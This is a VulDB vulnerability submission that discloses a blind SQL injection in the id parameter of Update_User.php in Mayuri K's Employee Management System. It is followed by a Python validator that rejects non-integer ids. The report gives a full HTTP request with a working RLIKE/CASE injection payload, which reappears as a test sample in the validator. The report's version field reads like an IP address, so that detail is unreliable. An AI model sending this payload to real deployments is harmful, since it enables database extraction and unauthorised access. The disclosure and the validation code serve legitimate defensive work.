Title | mayuri_k Web 1 SQL Injection |
---|
Description | Exploit Title: SQL Injection Vulnerability in Employee Management System
Date: 04/02/2025
Exploit Author: Xcode0x
Twitter: @xcode0x
Vendor Homepage: [www.mayurik.com]
Software Link: [Not provided]
Version: v1.0
Tested on: Kali Linux
SQL Injection Details:
The web application is vulnerable to a blind SQL injection on the endpoint /hr_soft/admin/Update_User.php. By injecting SQL payloads into the id parameter, attackers can execute arbitrary SQL commands on the database, potentially extracting sensitive information or gaining unauthorized access to the system.
Endpoint: POST /hr_soft/admin/Update_User.php
Example Vulnerable Request:
POST /hr_soft/admin/Update_User.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Origin: http://x.x.x.x
Connection: keep-alive
Referer: http://x.x.x.x/hr_soft/admin/View_user.php
Cookie: PHPSESSID=07e2sedv7t9ac46ep6u7iu2kng
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=69' RLIKE (SELECT (CASE WHEN (4038=4038) THEN 69 ELSE 0x28 END)) AND 'cKHc'='cKHc
Proof of Concept (POC):
Send the payload id=69' RLIKE (SELECT (CASE WHEN (4038=4038) THEN 69 ELSE 0x28 END)) AND 'cKHc'='cKHc in the id parameter using a tool like Burp Suite or manually via SQLMap.
The server confirms the payload execution without errors, indicating a successful SQL injection vulnerability. |
---|
User | xcode0x (UID 39076) |
---|
Submission | 02/04/2025 10:21 AM (4 months ago) |
---|
Moderation | 02/10/2025 09:54 AM (6 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 295070 [Mayuri K Employee Management System up to 192.168.70.3 Update_User.php ID sql injection] |
---|
Points | 16 |
---|
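
A defensive check for the `id` parameter described in the submission above, as an added example that is not part of the original report or the vendor's code. It assumes user ids are positive decimal integers; the function names and sample bodies are constructed for illustration, and the second sample is the request body shown on this page.

```python
import re
from urllib.parse import parse_qs

# Assumption: user ids in this application are positive decimal integers.
# [0-9] (not \d) excludes non-ASCII digits; fullmatch() excludes a trailing newline.
ID_RE = re.compile(r"[1-9][0-9]{0,9}")


def parse_user_id(body: str) -> int:
    """Return the id from a form-encoded POST body, or raise ValueError."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("id", [])
    if len(values) != 1:
        # Missing or repeated id: refuse rather than guess which copy the backend uses.
        raise ValueError("id must appear exactly once")
    if not ID_RE.fullmatch(values[0]):
        raise ValueError("id is not a positive integer")
    return int(values[0])


def screen(bodies):
    """Map each body to ('allow', id) or ('reject', reason)."""
    results = []
    for body in bodies:
        try:
            results.append(("allow", parse_user_id(body)))
        except ValueError as exc:
            results.append(("reject", str(exc)))
    return results


# Constructed sample bodies; the second is the request body shown on this page.
SAMPLES = [
    "id=69",
    "id=69' RLIKE (SELECT (CASE WHEN (4038=4038) THEN 69 ELSE 0x28 END)) AND 'cKHc'='cKHc",
    "id=69%27",       # URL-encoded quote
    "id=69&id=70",    # duplicated parameter
    "id=69%0a",       # URL-encoded trailing newline
    "name=alice",     # id missing
]

if __name__ == "__main__":
    for body, verdict in zip(SAMPLES, screen(SAMPLES)):
        print(verdict, body)
```

Strict validation of this kind complements binding `id` as a query parameter in the server-side code; it does not replace it.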